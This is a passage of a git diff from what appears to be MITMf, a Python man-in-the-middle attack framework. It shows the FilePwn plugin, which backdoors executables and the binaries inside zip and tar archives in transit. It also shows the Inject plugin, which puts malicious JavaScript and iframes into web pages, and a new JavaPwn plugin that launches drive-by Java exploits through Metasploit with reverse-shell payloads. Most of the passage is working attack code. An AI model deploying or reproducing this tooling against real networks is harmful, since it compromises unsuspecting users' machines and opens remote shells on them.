'7f454c46'.decode('hex')) + + #FilePwn options + self.userConfig = self.config['FilePwn'] + self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] + self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] + self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] + self.WindowsType = self.userConfig['targets']['ALL']['WindowsType'] + self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86'] + self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64'] + self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] + self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86'] + self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64'] + self.FatPriority = self.userConfig['targets']['ALL']['FatPriority'] + self.zipblacklist = self.userConfig['ZIP']['blacklist'] + self.tarblacklist = self.userConfig['TAR']['blacklist'] + + #Metasploit options + msfcfg = self.config['MITMf']['Metasploit'] + rpcip = msfcfg['rpcip'] + rpcpass = msfcfg['rpcpass'] + + try: + msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary + msf.login('msf', rpcpass) + version = msf.call('core.version')['version'] + self.tree_output.append("Connected to Metasploit v{}".format(version)) + except Exception: + sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") + + self.tree_output.append("Setting up Metasploit payload handlers") + jobs = msf.call('job.list') + for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: + cmd = "use exploit/multi/handler\n" + cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) + cmd += "set LHOST {}\n".format(config["HOST"]) + cmd += "set LPORT {}\n".format(config["PORT"]) + cmd += "exploit -j\n" + + if jobs: + for pid, name in jobs.iteritems(): + info = msf.call('job.info', [pid]) + if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): + #Create a virtual console + c_id = msf.call('console.create')['id'] + + #write the cmd to the newly created console + msf.call('console.write', [c_id, cmd]) + else: + #Create a virtual console + c_id = msf.call('console.create')['id'] + + #write the cmd to the newly created console + msf.call('console.write', [c_id, cmd]) + + def onConfigChange(self): + self.initialize(self.options) + + def convert_to_Bool(self, aString): + if aString.lower() == 'true': + return True + elif aString.lower() == 'false': + return False + elif aString.lower() == 'none': + return None + + def bytes_have_format(self, bytess, formatt): + number = self.magicNumbers[formatt] + if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']: + return True + return False + + def binaryGrinder(self, binaryFile): + """ + Feed potential binaries into this function, + it will return the result PatchedBinary, False, or None + """ + + with open(binaryFile, 'r+b') as f: + binaryTMPHandle = f.read() + + binaryHeader = binaryTMPHandle[:4] + result = None + + try: + if binaryHeader[:2] == 'MZ': # PE/COFF + pe = pefile.PE(data=binaryTMPHandle, fast_load=True) + magic = pe.OPTIONAL_HEADER.Magic + machineType = pe.FILE_HEADER.Machine + + #update when supporting more than one arch + if (magic == int('20B', 16) and machineType == 0x8664 and + self.WindowsType.lower() in ['all', 'x64']): + add_section = False + cave_jumping = False + if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': + add_section = True + elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': + cave_jumping = True + + # if automatic override + if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic': + cave_jumping = True + + targetFile = pebin.pebin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.WindowsIntelx64['SHELL'], + HOST=self.WindowsIntelx64['HOST'], + PORT=int(self.WindowsIntelx64['PORT']), + ADD_SECTION=add_section, + CAVE_JUMPING=cave_jumping, + IMAGE_TYPE=self.WindowsType, + PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), + SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], + ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), + PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() + ) + + result = targetFile.run_this() + + elif (machineType == 0x14c and + self.WindowsType.lower() in ['all', 'x86']): + add_section = False + cave_jumping = False + #add_section wins for cave_jumping + #default is single for BDF + if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': + add_section = True + elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': + cave_jumping = True + + # if automatic override + if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic': + cave_jumping = True + + targetFile = pebin.pebin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.WindowsIntelx86['SHELL'], + HOST=self.WindowsIntelx86['HOST'], + PORT=int(self.WindowsIntelx86['PORT']), + ADD_SECTION=add_section, + CAVE_JUMPING=cave_jumping, + IMAGE_TYPE=self.WindowsType, + PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), + SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], + ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']), + PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() + ) + + result = targetFile.run_this() + + elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF + + targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) + targetFile.support_check() + + if targetFile.class_type == 0x1: + #x86CPU Type + targetFile = elfbin.elfbin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.LinuxIntelx86['SHELL'], + HOST=self.LinuxIntelx86['HOST'], + PORT=int(self.LinuxIntelx86['PORT']), + SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'], + IMAGE_TYPE=self.LinuxType + ) + result = targetFile.run_this() + elif targetFile.class_type == 0x2: + #x64 + targetFile = elfbin.elfbin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.LinuxIntelx64['SHELL'], + HOST=self.LinuxIntelx64['HOST'], + PORT=int(self.LinuxIntelx64['PORT']), + SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'], + IMAGE_TYPE=self.LinuxType + ) + result = targetFile.run_this() + + elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho + targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) + targetFile.support_check() + + #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE + + if targetFile.FAT_FILE is True: + if self.FatPriority == 'x86': + targetFile = machobin.machobin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx86['SHELL'], + HOST=self.MachoIntelx86['HOST'], + PORT=int(self.MachoIntelx86['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) + result = targetFile.run_this() + + elif self.FatPriority == 'x64': + targetFile = machobin.machobin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx64['SHELL'], + HOST=self.MachoIntelx64['HOST'], + PORT=int(self.MachoIntelx64['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) + result = targetFile.run_this() + + elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': + targetFile = machobin.machobin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx86['SHELL'], + HOST=self.MachoIntelx86['HOST'], + PORT=int(self.MachoIntelx86['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) + result = targetFile.run_this() + + elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': + targetFile = machobin.machobin(FILE=binaryFile, + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx64['SHELL'], + HOST=self.MachoIntelx64['HOST'], + PORT=int(self.MachoIntelx64['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) + result = targetFile.run_this() + + self.patched.put(result) + return + + except Exception as e: + print 'Exception', str(e) + mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e)) + return None + + def tar_files(self, aTarFileBytes, formatt): + "When called will unpack and edit a Tar File and return a tar file" + + print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB' + + if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): + print "[!] TarFile over allowed size" + mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes))) + self.patched.put(aTarFileBytes) + return + + with tempfile.NamedTemporaryFile() as tarFileStorage: + tarFileStorage.write(aTarFileBytes) + tarFileStorage.flush() + + if not tarfile.is_tarfile(tarFileStorage.name): + print '[!] Not a tar file' + self.patched.put(aTarFileBytes) + return + + compressionMode = ':' + if formatt == 'gz': + compressionMode = ':gz' + if formatt == 'bz': + compressionMode = ':bz2' + + tarFile = None + try: + tarFileStorage.seek(0) + tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode) + except tarfile.ReadError: + pass + + if tarFile is None: + print '[!] Not a tar file' + self.patched.put(aTarFileBytes) + return + + print '[*] Tar file contents and info:' + print '[*] Compression:', formatt + + members = tarFile.getmembers() + for info in members: + print "\t", info.name, info.mtime, info.size + + newTarFileStorage = tempfile.NamedTemporaryFile() + newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage) + + patchCount = 0 + wasPatched = False + + for info in members: + print "[*] >>> Next file in tarfile:", info.name + + if not info.isfile(): + print info.name, 'is not a file' + newTarFile.addfile(info, tarFile.extractfile(info)) + continue + + if info.size >= long(self.FileSizeMax): + print info.name, 'is too big' + newTarFile.addfile(info, tarFile.extractfile(info)) + continue + + # Check against keywords + keywordCheck = False + + if type(self.tarblacklist) is str: + if self.tarblacklist.lower() in info.name.lower(): + keywordCheck = True + + else: + for keyword in self.tarblacklist: + if keyword.lower() in info.name.lower(): + keywordCheck = True + continue + + if keywordCheck is True: + print "[!] Tar blacklist enforced!" + mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name)) + continue + + # Try to patch + extractedFile = tarFile.extractfile(info) + + if patchCount >= int(self.userConfig['TAR']['patchCount']): + newTarFile.addfile(info, extractedFile) + else: + # create the file on disk temporarily for fileGrinder to run on it + with tempfile.NamedTemporaryFile() as tmp: + shutil.copyfileobj(extractedFile, tmp) + tmp.flush() + patchResult = self.binaryGrinder(tmp.name) + if patchResult: + patchCount += 1 + file2 = "backdoored/" + os.path.basename(tmp.name) + print "[*] Patching complete, adding to tar file." + info.size = os.stat(file2).st_size + with open(file2, 'rb') as f: + newTarFile.addfile(info, f) + mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name)) + os.remove(file2) + wasPatched = True + else: + print "[!] Patching failed" + with open(tmp.name, 'rb') as f: + newTarFile.addfile(info, f) + mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name)) + if patchCount == int(self.userConfig['TAR']['patchCount']): + mitmf_logger.info("Met Tar config patchCount limit.") + + # finalize the writing of the tar file first + newTarFile.close() + + # then read the new tar file into memory + newTarFileStorage.seek(0) + ret = newTarFileStorage.read() + newTarFileStorage.close() # it's automatically deleted + + if wasPatched is False: + # If nothing was changed return the original + print "[*] No files were patched forwarding original file" + self.patched.put(aTarFileBytes) + return + else: + self.patched.put(ret) + return + + def zip_files(self, aZipFile): + "When called will unpack and edit a Zip File and return a zip file" + + print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' + + if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): + print "[!] ZipFile over allowed size" + mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile))) + self.patched.put(aZipFile) + return + + tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) + tmpDir = '/tmp/' + tmpRan + tmpFile = '/tmp/' + tmpRan + '.zip' + + os.mkdir(tmpDir) + + with open(tmpFile, 'w') as f: + f.write(aZipFile) + + zippyfile = zipfile.ZipFile(tmpFile, 'r') + + #encryption test + try: + zippyfile.testzip() + + except RuntimeError as e: + if 'encrypted' in str(e): + mitmf_logger.info('Encrypted zipfile found. Not patching.') + return aZipFile + + print "[*] ZipFile contents and info:" + + for info in zippyfile.infolist(): + print "\t", info.filename, info.date_time, info.file_size + + zippyfile.extractall(tmpDir) + + patchCount = 0 + + wasPatched = False + + for info in zippyfile.infolist(): + print "[*] >>> Next file in zipfile:", info.filename + + if os.path.isdir(tmpDir + '/' + info.filename) is True: + print info.filename, 'is a directory' + continue + + #Check against keywords + keywordCheck = False + + if type(self.zipblacklist) is str: + if self.zipblacklist.lower() in info.filename.lower(): + keywordCheck = True + + else: + for keyword in self.zipblacklist: + if keyword.lower() in info.filename.lower(): + keywordCheck = True + continue + + if keywordCheck is True: + print "[!] Zip blacklist enforced!" + mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename)) + continue + + patchResult = self.binaryGrinder(tmpDir + '/' + info.filename) + + if patchResult: + patchCount += 1 + file2 = "backdoored/" + os.path.basename(info.filename) + print "[*] Patching complete, adding to zip file." + shutil.copyfile(file2, tmpDir + '/' + info.filename) + mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename)) + os.remove(file2) + wasPatched = True + else: + print "[!] Patching failed" + mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename)) + + print '-' * 10 + + if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting. + mitmf_logger.info("Met Zip config patchCount limit.") + break + + zippyfile.close() + + zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED) + + print "[*] Writing to zipfile:", tmpFile + + for base, dirs, files in os.walk(tmpDir): + for afile in files: + filename = os.path.join(base, afile) + print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '') + zipResult.write(filename, arcname=filename.replace(tmpDir + '/', '')) + + zipResult.close() + #clean up + shutil.rmtree(tmpDir) + + with open(tmpFile, 'rb') as f: + tempZipFile = f.read() + os.remove(tmpFile) + + if wasPatched is False: + print "[*] No files were patched forwarding original file" + self.patched.put(aZipFile) + return + else: + self.patched.put(tempZipFile) + return + + def handleResponse(self, request, data): + + content_header = request.client.headers['Content-Type'] + client_ip = request.client.getClientIP() + + if content_header in self.zipMimeTypes: + + if self.bytes_have_format(data, 'zip'): + mitmf_logger.info("{} Detected supported zip file type!".format(client_ip)) + + process = multiprocessing.Process(name='zip', target=self.zip, args=(data,)) + process.daemon = True + process.start() + process.join() + bd_zip = self.patched.get() + + if bd_zip: + mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) + return {'request': request, 'data': bd_zip} + + else: + for tartype in ['gz','bz','tar']: + if self.bytes_have_format(data, tartype): + mitmf_logger.info("{} Detected supported tar file type!".format(client_ip)) + + process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,)) + process.daemon = True + process.start() + process.join() + bd_tar = self.patched.get() + + if bd_tar: + mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) + return {'request': request, 'data': bd_tar} + + + elif content_header in self.binaryMimeTypes: + for bintype in ['pe','elf','fatfile','machox64','machox86']: + if self.bytes_have_format(data, bintype): + mitmf_logger.info("{} Detected supported binary type!".format(client_ip)) + fd, tmpFile = mkstemp() + with open(tmpFile, 'w') as f: + f.write(data) + + process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) + process.daemon = True + process.start() + process.join() + patchb = self.patched.get() + + if patchb: + bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() + os.remove('./backdoored/' + os.path.basename(tmpFile)) + mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) + return {'request': request, 'data': bd_binary} + + else: + mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header)) + return {'request': request, 'data': data} \ No newline at end of file diff --git a/plugins/Inject.py b/plugins/Inject.py index 2b75e37..82877eb 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -53,18 +53,6 @@ class Inject(CacheKill, Plugin): self.match_str = options.match_str self.html_payload = options.html_payload - if self.white_ips: - temp = [] - for ip in self.white_ips.split(','): - temp.append(ip) - self.white_ips = temp - - if self.black_ips: - temp = [] - for ip in self.black_ips.split(','): - temp.append(ip) - self.black_ips = temp - if self.options.preserve_cache: self.implements.remove("handleHeader") self.implements.remove("connectionMade") @@ -82,8 +70,8 @@ class Inject(CacheKill, Plugin): #If you have MSF on another host, you may need to check prior to injection #print "http://" + request.client.getRequestHostname() + request.uri ip, hn, mime = self._get_req_info(request) - if self._should_inject(ip, hn, mime) and (not self.js_src == self.html_src is not None or not self.html_payload == ""): - if hn not in self.proxyip: #prevents recursive injecting + if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.proxyip): + if (not self.js_src == self.html_src is not None or not self.html_payload == ""): data = self._insert_html(data, post=[(self.match_str, self._get_payload())]) self.ctable[ip] = time.time() self.dtable[ip+hn] = True @@ -95,39 +83,28 @@ class Inject(CacheKill, Plugin): def _get_payload(self): return self._get_js() + self._get_iframe() + self.html_payload - def add_options(self, options): - options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.") - options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.") - options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.") - options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.") - options.add_argument("--match-str", type=str, default="", help="String you would like to match and place your payload before. ( by default)") - options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.") - group = options.add_mutually_exclusive_group(required=False) - group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.") - group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.") - group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.") - group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips") - group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips") - - def _should_inject(self, ip, hn, mime): + def _ip_filter(self, ip): if self.white_ips is not None: - if ip in self.white_ips: + if ip in self.white_ips.split(','): return True else: return False if self.black_ips is not None: - if ip in self.black_ips: + if ip in self.black_ips.split(','): return False else: return True + return True + + def _should_inject(self, ip, hn, mime): + if self.count_limit == self.rate_limit is None and not self.per_domain: return True if self.count_limit is not None and self.count > self.count_limit: - #print "1" return False if self.rate_limit is not None: @@ -176,3 +153,17 @@ class Inject(CacheKill, Plugin): data = re.sub(r, post[i][1]+"\g", data) return data + + def add_options(self, options): + options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.") + options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.") + options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.") + options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.") + options.add_argument("--match-str", type=str, default="", help="String you would like to match and place your payload before. ( by default)") + options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.") + group = options.add_mutually_exclusive_group(required=False) + group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.") + group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.") + group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.") + group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips") + group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips") diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py new file mode 100644 index 0000000..1a479ba --- /dev/null +++ b/plugins/JavaPwn.py @@ -0,0 +1,231 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import string +import random +import threading +import sys +import logging + +from time import sleep +from core.msfrpc import Msfrpc +from core.utils import SystemConfig +from plugins.plugin import Plugin +from plugins.BrowserProfiler import BrowserProfiler + +mitmf_logger = logging.getLogger("mitmf") + +class JavaPwn(BrowserProfiler, Plugin): + name = "JavaPwn" + optname = "javapwn" + desc = "Performs drive-by attacks on clients with out-of-date java browser plugins" + tree_output = [] + version = "0.3" + has_opts = False + + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.msfip = SystemConfig.getIP(options.interface) + + try: + msfcfg = options.configfile['MITMf']['Metasploit'] + except Exception, e: + sys.exit("[-] Error parsing Metasploit options in config file : {}".format(e)) + + try: + self.javacfg = options.configfile['JavaPwn'] + except Exception, e: + sys.exit("[-] Error parsing config for JavaPwn: {}".format(e)) + + self.msfport = msfcfg['msfport'] + self.rpcip = msfcfg['rpcip'] + self.rpcpass = msfcfg['rpcpass'] + + #Initialize the BrowserProfiler plugin + BrowserProfiler.initialize(self, options) + self.black_ips = [] + + try: + self.msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary + self.msf.login('msf', self.rpcpass) + version = self.msf.call('core.version')['version'] + self.tree_output.append("Connected to Metasploit v{}".format(version)) + except Exception: + sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") + + def onConfigChange(self): + self.initialize(self.options) + + def startThread(self, options): + self.pwn() + + def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning) + return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5)) + + def get_exploit(self, java_version): + exploits = [] + + client_vstring = java_version[:-len(java_version.split('.')[3])-1] + client_uversion = int(java_version.split('.')[3]) + + for ver in self.javacfg['Multi'].iteritems(): + if type(ver[1]) is list: + for list_vers in ver[1]: + + version_string = list_vers[:-len(list_vers.split('.')[3])-1] + update_version = int(list_vers.split('.')[3]) + + if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): + if client_uversion == update_version: + exploits.append(ver[0]) + elif (client_vstring == version_string): + if client_uversion <= update_version: + exploits.append(ver[0]) + else: + version_string = ver[1][:-len(ver[1].split('.')[3])-1] + update_version = int(ver[1].split('.')[3]) + + if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): + if client_uversion == update_version: + exploits.append(ver[0]) + elif client_vstring == version_string: + if client_uversion <= update_version: + exploits.append(ver[0]) + + return exploits + + + def injectWait(self, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions + #inject iframe + mitmf_logger.info("{} >> now injecting iframe to trigger exploit".format(client_ip)) + self.html_payload = "".format(self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects + + mitmf_logger.info('{} >> waiting for ze shellz, Please wait...'.format(client_ip)) + + exit = False + i = 1 + while i <= 30: #wait max 60 seconds for a new shell + if exit: + break + shell = self.msf.call('session.list') #poll metasploit every 2 seconds for new sessions + if len(shell) > 0: + for k, v in shell.iteritems(): + if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted + mitmf_logger.info("{} >> Got shell!".format(client_ip)) + self.sploited_ips.append(client_ip) #target successfuly owned :) + self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped + exit = True + break + sleep(2) + i += 1 + + if exit is False: #We didn't get a shell :( + mitmf_logger.info("{} >> session not established after 30 seconds".format(client_ip)) + + self.html_payload = self.get_payload() # restart the BrowserProfiler plugin + + def send_command(self, cmd, vic_ip): + try: + mitmf_logger.info("{} >> sending commands to metasploit".format(vic_ip)) + + #Create a virtual console + console_id = self.msf.call('console.create')['id'] + + #write the cmd to the newly created console + self.msf.call('console.write', [console_id, cmd]) + + mitmf_logger.info("{} >> commands sent succesfully".format(vic_ip)) + except Exception, e: + mitmf_logger.info('{} >> Error accured while interacting with metasploit: {}:{}'.format(vic_ip, Exception, e)) + + def pwn(self): + self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit + while True: + if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled + + brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format + + if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited + + vic_ip = brwprofile['ip'] + + mitmf_logger.info("{} >> client has java version {} installed! Proceeding...".format(vic_ip, brwprofile['java_version'])) + mitmf_logger.info("{} >> Choosing exploit based on version string".format(vic_ip)) + + exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg + + if exploits: + + if len(exploits) > 1: + mitmf_logger.info("{} >> client is vulnerable to {} exploits!".format(vic_ip, len(exploits))) + exploit = random.choice(exploits) + mitmf_logger.info("{} >> choosing {}".format(vic_ip, exploit)) + else: + mitmf_logger.info("{} >> client is vulnerable to {}!".format(vic_ip, exploits[0])) + exploit = exploits[0] + + #here we check to see if we already set up the exploit to avoid creating new jobs for no reason + jobs = self.msf.call('job.list') #get running jobs + if len(jobs) > 0: + for k, v in jobs.iteritems(): + info = self.msf.call('job.info', [k]) + if exploit in info['name']: + mitmf_logger.info('{} >> {} already started'.format(vic_ip, exploit)) + url = info['uripath'] #get the url assigned to the exploit + self.injectWait(self.msf, url, vic_ip) + + else: #here we setup the exploit + rand_port = random.randint(1000, 65535) #generate a random port for the payload listener + rand_url = self.rand_url() + #generate the command string to send to the virtual console + #new line character very important as it simulates a user pressing enter + cmd = "use exploit/{}\n".format(exploit) + cmd += "set SRVPORT {}\n".format(self.msfport) + cmd += "set URIPATH {}\n".format(rand_url) + cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform + cmd += "set LHOST {}\n".format(self.msfip) + cmd += "set LPORT {}\n".format(rand_port) + cmd += "exploit -j\n" + + mitmf_logger.debug("command string:\n{}".format(cmd)) + + self.send_command(cmd, vic_ip) + + self.injectWait(rand_url, vic_ip) + else: + #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert) + mitmf_logger.info("{} >> client is not vulnerable to any java exploit".format(vic_ip)) + mitmf_logger.info("{} >> falling back to the signed applet attack".format(vic_ip)) + + rand_url = self.rand_url() + rand_port = random.randint(1000, 65535) + + cmd = "use exploit/multi/browser/java_signed_applet\n" + cmd += "set SRVPORT {}\n".format(self.msfport) + cmd += "set URIPATH {}\n".format(rand_url) + cmd += "set PAYLOAD generic/shell_reverse_tcp\n" + cmd += "set LHOST {}\n".format(self.msfip) + cmd += "set LPORT {}\n".format(rand_port) + cmd += "exploit -j\n" + + self.send_command(cmd, vic_ip) + self.injectWait(rand_url, vic_ip) + sleep(1) diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py index c84655b..06bf464 100644 --- a/plugins/JsKeylogger.py +++ b/plugins/JsKeylogger.py @@ -17,10 +17,12 @@ # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 # USA # +import logging from plugins.plugin import Plugin from plugins.Inject import Inject -import logging + +mitmf_logger = logging.getLogger("mitmf") class jskeylogger(Inject, Plugin): name = "Javascript Keylogger" diff --git a/plugins/Replace.py b/plugins/Replace.py new file mode 100644 index 0000000..3f124dc --- /dev/null +++ b/plugins/Replace.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +""" +Plugin by @rubenthijssen +""" + +import sys +import logging +import time +import re +from plugins.plugin import Plugin +from plugins.CacheKill import CacheKill + +mitmf_logger = logging.getLogger("mitmf") + +class Replace(CacheKill, Plugin): + name = "Replace" + optname = "replace" + desc = "Replace arbitrary content in HTML content" + implements = ["handleResponse", "handleHeader", "connectionMade"] + depends = ["CacheKill"] + version = "0.1" + has_opts = True + + def initialize(self, options): + self.options = options + + self.search_str = options.search_str + self.replace_str = options.replace_str + self.regex_file = options.regex_file + + if (self.search_str is None or self.search_str == "") and self.regex_file is None: + sys.exit("[-] Please provide a search string or a regex file") + + self.regexes = [] + if self.regex_file is not None: + for line in self.regex_file: + self.regexes.append(line.strip().split("\t")) + + if self.options.keep_cache: + self.implements.remove("handleHeader") + self.implements.remove("connectionMade") + + self.ctable = {} + self.dtable = {} + self.mime = "text/html" + + def handleResponse(self, request, data): + ip, hn, mime = self._get_req_info(request) + + if self._should_replace(ip, hn, mime): + + if self.search_str is not None and self.search_str != "": + data = data.replace(self.search_str, self.replace_str) + mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str)) + + # Did the user provide us with a regex file? 